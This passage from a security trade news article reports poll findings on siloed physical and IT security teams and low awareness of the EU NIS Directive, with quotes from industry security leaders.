Of equal concern is the fact that organizations seem ill-prepared to deal with such an attack.

Over two thirds (68%) of respondents claimed that the security teams in charge of physical and digital systems never collaborate. These silos can be particularly damaging as IT and OT converge, for example with the proliferation of IoT in heavy industry.

“The increasing convergence of cyber and physical environments is inevitable, but managing them in a cohesive way will strengthen enterprise security,” argued Just Eat CISO, Kevin Fielder.

“Those intent on accessing money, information or IP will often find it easier to do so from the inside – and we’re moving to a world where this can mean immediate impact on life. Hacking a building’s management systems, for example, could suppress a fire alarm or sprinkler system, or prevent people leaving.”

The poll also revealed that just 16% of respondents were aware of the NIS Directive, an EU law now in force that aims to raise baseline security among firms in CNI sectors. Non-compliance can incur fines comparable to those under the GDPR.

“I can’t believe that any cybersecurity leader in a sector impacted by the NIS Directive would be unaware of its implications for their business,” argued Nigel Stanley, CTO of TÜV Rheinland.

“Lack of commitment to secure critical infrastructure is the worst sort of negligence. Forget what the regulators demand — organizations should take the initiative and secure assets based on a proportionate cybersecurity and business-led risk assessment.”

Infosecurity Europe will take place at London Olympia in Hammersmith from June 4-6, 2019.

Source: Information Security Magazine